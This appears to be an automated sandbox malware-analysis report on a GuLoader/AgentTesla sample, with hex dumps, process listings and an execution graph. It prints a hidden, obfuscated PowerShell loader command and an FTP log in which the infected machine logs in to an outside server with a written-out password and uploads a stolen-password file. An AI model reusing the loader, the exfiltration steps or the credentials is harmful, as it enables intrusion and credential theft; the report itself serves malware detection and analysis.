                                                          2024-10-07 07:30:38 UTC8000INData Raw: 5e c2 5d 85 ba 4a f7 2b a1 f9 e7 91 67 b7 b7 45 6f 91 7d 6a 92 fc 2e 13 b0 5e 7a 9d 87 6b aa c6 ec 9c 97 88 92 bf fe 1f c7 8b 7d 9e 62 d9 e2 c5 a9 61 0f f5 24 e2 61 bb 4d b2 c2 d9 e7 42 84 82 2b b6 a6 f4 ce 8c de 41 f4 d2 d0 b4 af 28 1f 46 fa 54 0e 82 57 78 2b 8d ed 93 03 48 7d 46 a5 e0 27 81 c0 7e 6e 6f 3a 5e e1 eb b9 1a c7 78 03 8b 54 a6 98 ce 73 47 41 88 a4 65 ae 4b ad 7b 6a 25 fe c7 47 9d ae 9b e9 fa de 8a a8 07 f4 3f e4 24 e6 56 ac 14 d8 f5 72 2a c2 62 81 02 33 06 4d db 51 28 90 a8 b2 be cd 87 f7 37 9a 24 ef 6f ab 38 61 58 47 48 aa a5 a8 96 e7 b9 e5 39 e5 44 12 9b 2f 44 94 bb de 77 7d b2 0a 01 54 51 23 88 55 ed 9c f6 84 a6 2e 72 f6 92 76 83 2d 0f 7e c1 ff b2 bf b6 bc c5 98 d7 16 f0 bc ba 04 88 94 e0 49 c8 5e 76 4f 71 d3 33 d8 5a 43 a4 f8 a7 8d 36 47
                                                          Data Ascii: ^]J+gEo}j.^zk}ba$aMB+A(FTWx+H}F'~no:^xTsGAeK{j%G?$Vr*b3MQ(7$o8aXGH9D/Dw}TQ#U.rv-~I^vOq3ZC6G
                                                          2024-10-07 07:30:38 UTC8000INData Raw: 4b 79 cc 29 ca 27 d2 3b 75 7f 63 c6 64 83 9b 4b 57 2f ef 9a 6d e0 f1 be c6 82 d4 2a 6a d8 e3 16 d0 59 00 ad 50 05 7b 1e a4 17 c1 83 10 95 cc 95 d3 f3 98 ab f0 1f a6 25 42 1c 35 1e 64 b1 cb d0 57 54 5e 9f 0c aa ff 69 33 d0 1d 35 bb e9 c8 82 8c d8 7c 97 bd ff cf 97 03 91 1b 37 f2 8b 7e 2d d2 62 52 ba c4 4f e6 51 78 e5 7d cd 7f 48 b6 46 b2 9b 31 2c c3 f0 5e c2 a3 8a b5 4a f6 ce 9d f0 e7 24 75 b7 b7 7f 91 90 55 58 92 fc 2e 33 4e 50 70 9d 41 18 a6 c6 cc 8d 69 84 98 41 d0 11 c7 8b 83 6c 6c e0 d0 dd a9 61 7c 74 25 db 70 45 43 b2 3c f5 e0 42 a4 9b d5 b8 ac dc 61 73 d2 4d 0a fc dd b4 8f 31 e1 47 c3 a4 00 8d 57 86 d9 81 e2 b9 03 4b 7d 46 a5 e0 28 b2 e7 7e 90 63 ce 52 cb e8 99 19 c7 86 02 92 54 a6 98 ce a5 da 40 88 c1 27 64 54 a7 2b 42 3f fe c7 70 02 8e 9c e9 da da
                                                          Data Ascii: Ky)';ucdKW/m*jYP{%B5dWT^i35|7~-bROQx}HF1,^J$uUX.3NPpAiAlla|t%pEC<BasM1GWK}F(~cRT@'dT+B?p
                                                          2024-10-07 07:30:38 UTC8000INData Raw: 5c d6 a2 5e e6 51 da 25 e9 10 8c 49 38 88 61 77 5f 56 75 ae 26 aa 2e 8a de d5 67 f7 c0 36 65 38 a4 a2 e4 bd 6e 5f 9c 5a b8 e2 2b f2 e4 b9 52 95 fb 83 e2 be 47 33 b4 52 d5 e4 65 45 10 88 df 17 7c ed ad af fa 4a 1e 52 04 c0 6c f6 0c bf 8b ae 3e ba be 13 89 bc 11 6c 1b 54 12 81 49 56 3f 91 f7 8b e0 4d 0a 1d 18 19 9a 73 6c d4 2d ad 8a ed a2 ef d5 5f 67 c4 4b 8d 9a 02 cb 07 d8 3b 49 72 9d c8 6b 7d 97 b5 5b de e1 a1 69 3d 95 b8 38 83 9e a5 6a d8 e9 16 d2 5b 00 73 5d 00 7b 71 72 06 dc 89 9e b3 ed 95 eb c5 ea e3 ef e1 db 11 58 34 9c 14 c6 9b 30 de 5e 54 5e 9d 0a aa 8d 13 14 df 6d 3d b2 e9 c8 88 5a c2 45 b2 b7 c6 d8 69 0f 95 e5 49 5c 94 80 51 a9 de 3f 3e 9f 6f 96 79 62 e5 55 38 11 e7 b0 b8 b6 60 3c 10 d7 d8 f0 c2 5d 8e 80 fc 09 cf 6e 22 f7 04 65 b7 49 72 73 91 92
                                                          Data Ascii: \^Q%I8aw_Vu&.g6e8n_Z+RG3ReE|JRl>lTIV?Msl-_gK;Irk}[i=8j[s]{qrX40^T^m=ZEiI\Q?>oybU8`<]n"eIrs
                                                          2024-10-07 07:30:38 UTC8000INData Raw: d5 f2 29 72 cb b0 ed a3 b0 2b 40 91 26 63 d9 3f 71 f9 d0 9f 65 7e cd f6 9f 1b 65 f9 db c7 81 cb 84 ac b3 3e 3a 29 fe 68 7e 17 a9 44 57 97 37 69 37 50 02 b8 8c 52 00 17 2a e6 4d e0 80 82 2b 42 3d ac 7c 53 02 6b ca 19 3b 6f cf e2 05 87 cf 46 ed f5 39 7c 5c 59 da fd d4 82 8a d0 7d cb 94 5c 31 3d 56 54 e9 6d 7a e6 94 f7 7e a0 fd c1 23 32 de fc 15 c5 5c 1c 5b a4 27 a4 cc 21 c5 91 f2 10 8a bd 1e 25 61 89 59 6b 69 50 2a ac d0 f4 d1 fa 99 8b a8 aa 16 ec 88 5c 9a 9c 74 77 ad 50 90 42 d5 fe eb d6 0b 99 f2 89 34 27 40 33 cc 8a f2 e6 15 93 06 8b df 72 86 49 ad a9 9f 3b 02 52 0e 3e 9c f0 0a 41 79 a3 39 c9 a0 34 a2 ba 9f 4a 0a 54 ec 87 6a fc 4d 3a d3 e4 37 22 65 16 e6 13 61 7f 08 e4 d3 a1 88 13 c1 98 d4 30 51 3a 47 8c c2 dc c6 0d d8 54 06 7e 9d ce 95 8f 90 b5 a5 2c e8
                                                          Data Ascii: )r+@&c?qe~e>:)h~DW7i7PR*M+B=|Sk;oF9|\Y}\1=VTmz~#2\['!%aYkiP*\twPB4'@3rI;R>Ay94JTjM:7"ea0Q:GT~,


                                                          TimestampSource PortDest PortSource IPDest IPCommands
                                                          Oct 7, 2024 09:30:41.150233984 CEST2149973185.146.87.128192.168.2.7220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                          220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 27 of 50 allowed.
                                                          220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 27 of 50 allowed.220-Local time is now 10:30. Server port: 21.
                                                          220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 27 of 50 allowed.220-Local time is now 10:30. Server port: 21.220-This is a private system - No anonymous login
                                                          220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 27 of 50 allowed.220-Local time is now 10:30. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                                          220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 27 of 50 allowed.220-Local time is now 10:30. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                                          Oct 7, 2024 09:30:41.150448084 CEST4997321192.168.2.7185.146.87.128USER AdminFTP@rusticpensiune.ro
                                                          Oct 7, 2024 09:30:41.360739946 CEST2149973185.146.87.128192.168.2.7331 User AdminFTP@rusticpensiune.ro OK. Password required
                                                          Oct 7, 2024 09:30:41.360883951 CEST4997321192.168.2.7185.146.87.128PASS hr,d@KUwa5llI%*RNL^J]g%8I;!;_Ne#G1h~lE!*86DAAD6#iLm$x)r+e1z$p+_Q,4_(f!};B?vD!IG?NqT[zOHNr6_nww[S]V?MlcYSt_QO
                                                          Oct 7, 2024 09:30:41.620598078 CEST2149973185.146.87.128192.168.2.7230 OK. Current restricted directory is /
                                                          Oct 7, 2024 09:30:41.831144094 CEST2149973185.146.87.128192.168.2.7504 Unknown command
                                                          Oct 7, 2024 09:30:41.831824064 CEST4997321192.168.2.7185.146.87.128PWD
                                                          Oct 7, 2024 09:30:42.042131901 CEST2149973185.146.87.128192.168.2.7257 "/" is your current location
                                                          Oct 7, 2024 09:30:42.042412043 CEST4997321192.168.2.7185.146.87.128TYPE I
                                                          Oct 7, 2024 09:30:42.252959967 CEST2149973185.146.87.128192.168.2.7200 TYPE is now 8-bit binary
                                                          Oct 7, 2024 09:30:42.253185987 CEST4997321192.168.2.7185.146.87.128PASV
                                                          Oct 7, 2024 09:30:42.463851929 CEST2149973185.146.87.128192.168.2.7227 Entering Passive Mode (185,146,87,128,209,155)
                                                          Oct 7, 2024 09:30:42.473706961 CEST4997321192.168.2.7185.146.87.128STOR PW_user-468325_2024_10_07_04_35_19.html
                                                          Oct 7, 2024 09:30:43.064012051 CEST2149973185.146.87.128192.168.2.7150 Accepted data connection
                                                          Oct 7, 2024 09:30:43.275490999 CEST2149973185.146.87.128192.168.2.7226-File successfully transferred
                                                          226-File successfully transferred226 0.211 seconds (measured here), 1.49 Kbytes per second

                                                          Click to jump to process

                                                          Click to jump to process

                                                          Click to dive into process behavior distribution

                                                          Click to jump to process

                                                          Target ID:0
                                                          Start time:03:29:42
                                                          Start date:07/10/2024
                                                          Path:C:\Users\user\Desktop\ZAMOWIEN.EXE.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\ZAMOWIEN.EXE.exe"
                                                          Imagebase:0x400000
                                                          File size:456'011 bytes
                                                          MD5 hash:6B63BDC24B2E1162073514F7934A4F9C
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:2
                                                          Start time:03:29:43
                                                          Start date:07/10/2024
                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden "$Chippies=Get-Content -Raw 'C:\Users\user~1\AppData\Local\Temp\deciliteren\afstnings\Rapses.Arb';$Notaudskrivningsdatoen=$Chippies.SubString(53160,3);.$Notaudskrivningsdatoen($Chippies)"
                                                          Imagebase:0x5d0000
                                                          File size:433'152 bytes
                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.1686392459.000000000C60C000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:4
                                                          Start time:03:29:43
                                                          Start date:07/10/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff75da10000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:12
                                                          Start time:04:35:03
                                                          Start date:07/10/2024
                                                          Path:C:\Windows\SysWOW64\msiexec.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\syswow64\msiexec.exe"
                                                          Imagebase:0x7f0000
                                                          File size:59'904 bytes
                                                          MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.2530421753.0000000022D27000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.2530421753.0000000022CE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.2530421753.0000000022CE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:high
                                                          Has exited:false

                                                          Reset < >

                                                            Execution Graph

                                                            Execution Coverage:24%
                                                            Dynamic/Decrypted Code Coverage:0%
                                                            Signature Coverage:21.6%
                                                            Total number of Nodes:1246
                                                            Total number of Limit Nodes:34
                                                            execution_graph 3527 4019c0 3528 402a07 18 API calls 3527->3528 3529 4019c7 3528->3529 3530 402a07 18 API calls 3529->3530 3531 4019d0 3530->3531 3532 4019d7 lstrcmpiA 3531->3532 3533 4019e9 lstrcmpA 3531->3533 3534 4019dd 3532->3534 3533->3534 3535 4023c6 3546 402b11 3535->3546 3537 4023d0 3538 402a07 18 API calls 3537->3538 3539 4023d9 3538->3539 3540 4023e3 RegQueryValueExA 3539->3540 3543 40266d 3539->3543 3541 402409 RegCloseKey 3540->3541 3542 402403 3540->3542 3541->3543 3542->3541 3550 405ada wsprintfA 3542->3550 3547 402a07 18 API calls 3546->3547 3548 402b2a 3547->3548 3549 402b38 RegOpenKeyExA 3548->3549 3549->3537 3550->3541 2774 404fc7 2775 405173 2774->2775 2776 404fe8 GetDlgItem GetDlgItem GetDlgItem 2774->2776 2778 4051a4 2775->2778 2779 40517c GetDlgItem CreateThread CloseHandle 2775->2779 2820 403ec1 SendMessageA 2776->2820 2781 4051cf 2778->2781 2782 4051f1 2778->2782 2783 4051bb ShowWindow ShowWindow 2778->2783 2779->2778 2893 404f5b OleInitialize 2779->2893 2780 405059 2785 405060 GetClientRect GetSystemMetrics SendMessageA SendMessageA 2780->2785 2784 40522d 2781->2784 2787 4051e0 2781->2787 2788 405206 ShowWindow 2781->2788 2829 403ef3 2782->2829 2825 403ec1 SendMessageA 2783->2825 2784->2782 2795 405238 SendMessageA 2784->2795 2793 4050b3 SendMessageA SendMessageA 2785->2793 2794 4050cf 2785->2794 2826 403e65 2787->2826 2791 405226 2788->2791 2792 405218 2788->2792 2790 4051ff 2798 403e65 SendMessageA 2791->2798 2843 404e89 2792->2843 2793->2794 2799 4050e2 2794->2799 2800 4050d4 SendMessageA 2794->2800 2795->2790 2801 405251 CreatePopupMenu 2795->2801 2798->2784 2821 403e8c 2799->2821 2800->2799 2854 405b9e 2801->2854 2805 4050f2 2808 4050fb ShowWindow 2805->2808 2809 40512f GetDlgItem SendMessageA 2805->2809 2806 405274 GetWindowRect 2811 405290 TrackPopupMenu 2806->2811 2807 405287 2807->2811 2812 405111 ShowWindow 2808->2812 2813 40511e 2808->2813 2809->2790 2810 405156 SendMessageA SendMessageA 2809->2810 2810->2790 2811->2790 2814 4052ae 2811->2814 2812->2813 2824 403ec1 SendMessageA 2813->2824 2815 4052ca SendMessageA 2814->2815 2815->2815 2817 4052e7 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 2815->2817 2818 405309 SendMessageA 2817->2818 2818->2818 2819 40532b GlobalUnlock SetClipboardData CloseClipboard 2818->2819 2819->2790 2820->2780 2822 405b9e 18 API calls 2821->2822 2823 403e97 SetDlgItemTextA 2822->2823 2823->2805 2824->2809 2825->2781 2827 403e72 SendMessageA 2826->2827 2828 403e6c 2826->2828 2827->2782 2828->2827 2830 403f0b GetWindowLongA 2829->2830 2840 403f94 2829->2840 2831 403f1c 2830->2831 2830->2840 2832 403f2b GetSysColor 2831->2832 2833 403f2e 2831->2833 2832->2833 2834 403f34 SetTextColor 2833->2834 2835 403f3e SetBkMode 2833->2835 2834->2835 2836 403f56 GetSysColor 2835->2836 2837 403f5c 2835->2837 2836->2837 2838 403f63 SetBkColor 2837->2838 2839 403f6d 2837->2839 2838->2839 2839->2840 2841 403f80 DeleteObject 2839->2841 2842 403f87 CreateBrushIndirect 2839->2842 2840->2790 2841->2842 2842->2840 2844 404f47 2843->2844 2845 404ea4 2843->2845 2844->2791 2846 404ec1 lstrlenA 2845->2846 2847 405b9e 18 API calls 2845->2847 2848 404eea 2846->2848 2849 404ecf lstrlenA 2846->2849 2847->2846 2851 404ef0 SetWindowTextA 2848->2851 2852 404efd 2848->2852 2849->2844 2850 404ee1 lstrcatA 2849->2850 2850->2848 2851->2852 2852->2844 2853 404f03 SendMessageA SendMessageA SendMessageA 2852->2853 2853->2844 2855 405bab 2854->2855 2856 405dce 2855->2856 2859 405c4c GetVersion 2855->2859 2860 405da5 lstrlenA 2855->2860 2861 405b9e 10 API calls 2855->2861 2865 405cc4 GetSystemDirectoryA 2855->2865 2866 405cd7 GetWindowsDirectoryA 2855->2866 2868 405b9e 10 API calls 2855->2868 2869 405d4e lstrcatA 2855->2869 2870 405d0b SHGetSpecialFolderLocation 2855->2870 2872 405a63 RegOpenKeyExA 2855->2872 2877 405de7 2855->2877 2886 405ada wsprintfA 2855->2886 2887 405b7c lstrcpynA 2855->2887 2857 405261 AppendMenuA 2856->2857 2888 405b7c lstrcpynA 2856->2888 2857->2806 2857->2807 2859->2855 2860->2855 2861->2860 2865->2855 2866->2855 2868->2855 2869->2855 2870->2855 2871 405d23 SHGetPathFromIDListA CoTaskMemFree 2870->2871 2871->2855 2873 405ad4 2872->2873 2874 405a96 RegQueryValueExA 2872->2874 2873->2855 2875 405ab7 RegCloseKey 2874->2875 2875->2873 2880 405df3 2877->2880 2878 405e5b 2879 405e5f CharPrevA 2878->2879 2882 405e7a 2878->2882 2879->2878 2880->2878 2881 405e50 CharNextA 2880->2881 2884 405e3e CharNextA 2880->2884 2885 405e4b CharNextA 2880->2885 2889 405654 2880->2889 2881->2878 2881->2880 2882->2855 2884->2880 2885->2881 2886->2855 2887->2855 2888->2857 2890 40565a 2889->2890 2891 40566d 2890->2891 2892 405660 CharNextA 2890->2892 2891->2880 2892->2890 2900 403ed8 2893->2900 2895 404fa5 2896 403ed8 SendMessageA 2895->2896 2898 404fb7 CoUninitialize 2896->2898 2897 404f7e 2897->2895 2903 401389 2897->2903 2901 403ef0 2900->2901 2902 403ee1 SendMessageA 2900->2902 2901->2897 2902->2901 2905 401390 2903->2905 2904 4013fe 2904->2897 2905->2904 2906 4013cb MulDiv SendMessageA 2905->2906 2906->2905 3554 4042ca 3555 4042f6 3554->3555 3556 404307 3554->3556 3615 405391 GetDlgItemTextA 3555->3615 3558 404313 GetDlgItem 3556->3558 3564 404372 3556->3564 3560 404327 3558->3560 3559 404301 3562 405de7 5 API calls 3559->3562 3563 40433b SetWindowTextA 3560->3563 3567 4056c2 4 API calls 3560->3567 3561 404456 3613 4045f1 3561->3613 3617 405391 GetDlgItemTextA 3561->3617 3562->3556 3568 403e8c 19 API calls 3563->3568 3564->3561 3569 405b9e 18 API calls 3564->3569 3564->3613 3566 403ef3 8 API calls 3571 404605 3566->3571 3572 404331 3567->3572 3573 404357 3568->3573 3574 4043e6 SHBrowseForFolderA 3569->3574 3570 404486 3575 405717 18 API calls 3570->3575 3572->3563 3581 405629 3 API calls 3572->3581 3576 403e8c 19 API calls 3573->3576 3574->3561 3577 4043fe CoTaskMemFree 3574->3577 3578 40448c 3575->3578 3579 404365 3576->3579 3580 405629 3 API calls 3577->3580 3618 405b7c lstrcpynA 3578->3618 3616 403ec1 SendMessageA 3579->3616 3583 40440b 3580->3583 3581->3563 3586 404442 SetDlgItemTextA 3583->3586 3590 405b9e 18 API calls 3583->3590 3585 40436b 3588 405ea7 3 API calls 3585->3588 3586->3561 3587 4044a3 3589 405ea7 3 API calls 3587->3589 3588->3564 3601 4044ab 3589->3601 3591 40442a lstrcmpiA 3590->3591 3591->3586 3594 40443b lstrcatA 3591->3594 3592 4044e5 3619 405b7c lstrcpynA 3592->3619 3594->3586 3595 4044ec 3596 4056c2 4 API calls 3595->3596 3597 4044f2 GetDiskFreeSpaceA 3596->3597 3599 404514 MulDiv 3597->3599 3603 404536 3597->3603 3599->3603 3600 405670 2 API calls 3600->3601 3601->3592 3601->3600 3601->3603 3602 4045a0 3605 4045c3 3602->3605 3607 40140b 2 API calls 3602->3607 3603->3602 3620 404672 3603->3620 3628 403eae KiUserCallbackDispatcher 3605->3628 3606 404592 3608 4045a2 SetDlgItemTextA 3606->3608 3609 404597 3606->3609 3607->3605 3608->3602 3612 404672 21 API calls 3609->3612 3611 4045df 3611->3613 3629 40425f 3611->3629 3612->3602 3613->3566 3615->3559 3616->3585 3617->3570 3618->3587 3619->3595 3621 40468c 3620->3621 3622 405b9e 18 API calls 3621->3622 3623 4046c1 3622->3623 3624 405b9e 18 API calls 3623->3624 3625 4046cc 3624->3625 3626 405b9e 18 API calls 3625->3626 3627 4046fd lstrlenA wsprintfA SetDlgItemTextA 3626->3627 3627->3606 3628->3611 3630 404272 SendMessageA 3629->3630 3631 40426d 3629->3631 3630->3613 3631->3630 3632 402b4c 3633 402b74 3632->3633 3634 402b5b SetTimer 3632->3634 3635 402bc9 3633->3635 3636 402b8e MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 3633->3636 3634->3633 3636->3635 3637 401ccc GetDlgItem GetClientRect 3638 402a07 18 API calls 3637->3638 3639 401cfc LoadImageA SendMessageA 3638->3639 3640 401d1a DeleteObject 3639->3640 3641 40289c 3639->3641 3640->3641 2944 40354d 2945 403565 2944->2945 2946 403557 CloseHandle 2944->2946 2951 403592 2945->2951 2946->2945 2952 4035a0 2951->2952 2953 4035a5 FreeLibrary GlobalFree 2952->2953 2954 40356a 2952->2954 2953->2953 2953->2954 2955 405459 2954->2955 2992 405717 2955->2992 2958 405481 DeleteFileA 2987 403576 2958->2987 2959 405498 2960 4055c6 2959->2960 3006 405b7c lstrcpynA 2959->3006 2960->2987 3025 405e80 FindFirstFileA 2960->3025 2962 4054be 2963 4054d1 2962->2963 2964 4054c4 lstrcatA 2962->2964 3007 405670 lstrlenA 2963->3007 2966 4054d7 2964->2966 2968 4054e5 lstrcatA 2966->2968 2970 4054f0 lstrlenA FindFirstFileA 2966->2970 2968->2970 2970->2960 2990 405514 2970->2990 2972 405654 CharNextA 2972->2990 2974 405411 5 API calls 2975 405600 2974->2975 2976 40561a 2975->2976 2980 405604 2975->2980 2977 404e89 25 API calls 2976->2977 2977->2987 2978 4055a5 FindNextFileA 2981 4055bd FindClose 2978->2981 2978->2990 2982 404e89 25 API calls 2980->2982 2980->2987 2981->2960 2983 405611 2982->2983 2984 405a30 40 API calls 2983->2984 2984->2987 2986 405459 64 API calls 2986->2990 2988 404e89 25 API calls 2988->2978 2989 404e89 25 API calls 2989->2990 2990->2972 2990->2978 2990->2986 2990->2988 2990->2989 3011 405b7c lstrcpynA 2990->3011 3012 405411 2990->3012 3020 405a30 2990->3020 3031 405b7c lstrcpynA 2992->3031 2994 405728 3032 4056c2 CharNextA CharNextA 2994->3032 2997 405479 2997->2958 2997->2959 2998 405de7 5 API calls 3004 40573e 2998->3004 2999 405769 lstrlenA 3000 405774 2999->3000 2999->3004 3002 405629 3 API calls 3000->3002 3001 405e80 2 API calls 3001->3004 3003 405779 GetFileAttributesA 3002->3003 3003->2997 3004->2997 3004->2999 3004->3001 3005 405670 2 API calls 3004->3005 3005->2999 3006->2962 3008 40567d 3007->3008 3009 405682 CharPrevA 3008->3009 3010 40568e 3008->3010 3009->3008 3009->3010 3010->2966 3011->2990 3038 405805 GetFileAttributesA 3012->3038 3015 405434 DeleteFileA 3018 40543a 3015->3018 3016 40542c RemoveDirectoryA 3016->3018 3017 40543e 3017->2990 3018->3017 3019 40544a SetFileAttributesA 3018->3019 3019->3017 3041 405ea7 GetModuleHandleA 3020->3041 3024 405a58 3024->2990 3026 405e96 FindClose 3025->3026 3027 4055ea 3025->3027 3026->3027 3027->2987 3028 405629 lstrlenA CharPrevA 3027->3028 3029 405643 lstrcatA 3028->3029 3030 4055f4 3028->3030 3029->3030 3030->2974 3031->2994 3033 4056dd 3032->3033 3037 4056ed 3032->3037 3035 4056e8 CharNextA 3033->3035 3033->3037 3034 40570d 3034->2997 3034->2998 3035->3034 3036 405654 CharNextA 3036->3037 3037->3034 3037->3036 3039 40541d 3038->3039 3040 405817 SetFileAttributesA 3038->3040 3039->3015 3039->3016 3039->3017 3040->3039 3042 405ec3 LoadLibraryA 3041->3042 3043 405ece GetProcAddress 3041->3043 3042->3043 3044 405a37 3042->3044 3043->3044 3044->3024 3045 4058a2 lstrcpyA 3044->3045 3046 4058f1 GetShortPathNameA 3045->3046 3047 4058cb 3045->3047 3048 405906 3046->3048 3049 405a2a 3046->3049 3069 40582a GetFileAttributesA CreateFileA 3047->3069 3048->3049 3051 40590e wsprintfA 3048->3051 3049->3024 3054 405b9e 18 API calls 3051->3054 3052 4058d5 CloseHandle GetShortPathNameA 3052->3049 3053 4058e9 3052->3053 3053->3046 3053->3049 3055 405936 3054->3055 3070 40582a GetFileAttributesA CreateFileA 3055->3070 3057 405943 3057->3049 3058 405952 GetFileSize GlobalAlloc 3057->3058 3059 405a23 CloseHandle 3058->3059 3060 405974 ReadFile 3058->3060 3059->3049 3060->3059 3061 40598c 3060->3061 3061->3059 3071 40578f lstrlenA 3061->3071 3064 4059a5 lstrcpyA 3067 4059c7 3064->3067 3065 4059b9 3066 40578f 4 API calls 3065->3066 3066->3067 3068 4059fe SetFilePointer WriteFile GlobalFree 3067->3068 3068->3059 3069->3052 3070->3057 3072 4057d0 lstrlenA 3071->3072 3073 4057a9 lstrcmpiA 3072->3073 3074 4057d8 3072->3074 3073->3074 3075 4057c7 CharNextA 3073->3075 3074->3064 3074->3065 3075->3072 3642 40264f 3643 402a07 18 API calls 3642->3643 3644 402656 FindFirstFileA 3643->3644 3645 402679 3644->3645 3646 402669 3644->3646 3650 405ada wsprintfA 3645->3650 3648 402680 3651 405b7c lstrcpynA 3648->3651 3650->3648 3651->3646 3652 4024cf 3653 4024d4 3652->3653 3654 4024e5 3652->3654 3655 4029ea 18 API calls 3653->3655 3656 402a07 18 API calls 3654->3656 3657 4024db 3655->3657 3658 4024ec lstrlenA 3656->3658 3659 40250b WriteFile 3657->3659 3660 40266d 3657->3660 3658->3657 3659->3660 3661 401650 3662 402a07 18 API calls 3661->3662 3663 401657 3662->3663 3664 402a07 18 API calls 3663->3664 3665 401660 3664->3665 3666 402a07 18 API calls 3665->3666 3667 401669 MoveFileA 3666->3667 3668 40167c 3667->3668 3674 401675 3667->3674 3670 405e80 2 API calls 3668->3670 3671 40217f 3668->3671 3669 401423 25 API calls 3669->3671 3672 40168b 3670->3672 3672->3671 3673 405a30 40 API calls 3672->3673 3673->3674 3674->3669 3675 403fd5 3676 403feb 3675->3676 3681 4040f7 3675->3681 3678 403e8c 19 API calls 3676->3678 3677 404166 3679 404170 GetDlgItem 3677->3679 3682 40423a 3677->3682 3680 404041 3678->3680 3685 404186 3679->3685 3686 4041f8 3679->3686 3683 403e8c 19 API calls 3680->3683 3681->3677 3681->3682 3687 40413b GetDlgItem SendMessageA 3681->3687 3684 403ef3 8 API calls 3682->3684 3688 40404e CheckDlgButton 3683->3688 3689 404235 3684->3689 3685->3686 3690 4041ac 6 API calls 3685->3690 3686->3682 3691 40420a 3686->3691 3706 403eae KiUserCallbackDispatcher 3687->3706 3704 403eae KiUserCallbackDispatcher 3688->3704 3690->3686 3695 404210 SendMessageA 3691->3695 3696 404221 3691->3696 3693 404161 3697 40425f SendMessageA 3693->3697 3695->3696 3696->3689 3699 404227 SendMessageA 3696->3699 3697->3677 3698 40406c GetDlgItem 3705 403ec1 SendMessageA 3698->3705 3699->3689 3701 404082 SendMessageA 3702 4040a0 GetSysColor 3701->3702 3703 4040a9 SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 3701->3703 3702->3703 3703->3689 3704->3698 3705->3701 3706->3693 3707 4014d6 3708 4029ea 18 API calls 3707->3708 3709 4014dc Sleep 3708->3709 3711 40289c 3709->3711 3353 401dd8 3354 402a07 18 API calls 3353->3354 3355 401dde 3354->3355 3356 402a07 18 API calls 3355->3356 3357 401de7 3356->3357 3358 402a07 18 API calls 3357->3358 3359 401df0 3358->3359 3360 402a07 18 API calls 3359->3360 3361 401df9 3360->3361 3362 401423 25 API calls 3361->3362 3363 401e00 ShellExecuteA 3362->3363 3364 401e2d 3363->3364 3712 40155b 3713 401577 ShowWindow 3712->3713 3714 40157e 3712->3714 3713->3714 3715 40158c ShowWindow 3714->3715 3716 40289c 3714->3716 3715->3716 3717 401edc 3718 402a07 18 API calls 3717->3718 3719 401ee3 GetFileVersionInfoSizeA 3718->3719 3720 401f06 GlobalAlloc 3719->3720 3722 401f5c 3719->3722 3721 401f1a GetFileVersionInfoA 3720->3721 3720->3722 3721->3722 3723 401f2b VerQueryValueA 3721->3723 3723->3722 3724 401f44 3723->3724 3728 405ada wsprintfA 3724->3728 3726 401f50 3729 405ada wsprintfA 3726->3729 3728->3726 3729->3722 3730 4025dd 3731 4025e4 3730->3731 3733 402849 3730->3733 3732 4029ea 18 API calls 3731->3732 3734 4025ef 3732->3734 3735 4025f6 SetFilePointer 3734->3735 3735->3733 3736 402606 3735->3736 3738 405ada wsprintfA 3736->3738 3738->3733 3744 4018e3 3745 40191a 3744->3745 3746 402a07 18 API calls 3745->3746 3747 40191f 3746->3747 3748 405459 71 API calls 3747->3748 3749 401928 3748->3749 3750 4035e5 3751 4035f0 3750->3751 3752 4035f4 3751->3752 3753 4035f7 GlobalAlloc 3751->3753 3753->3752 3754 4018e6 3755 402a07 18 API calls 3754->3755 3756 4018ed 3755->3756 3757 4053ad MessageBoxIndirectA 3756->3757 3758 4018f6 3757->3758 2907 401f68 2908 401f7a 2907->2908 2909 402028 2907->2909 2925 402a07 2908->2925 2912 401423 25 API calls 2909->2912 2917 40217f 2912->2917 2913 402a07 18 API calls 2914 401f8a 2913->2914 2915 401f92 GetModuleHandleA 2914->2915 2916 401f9f 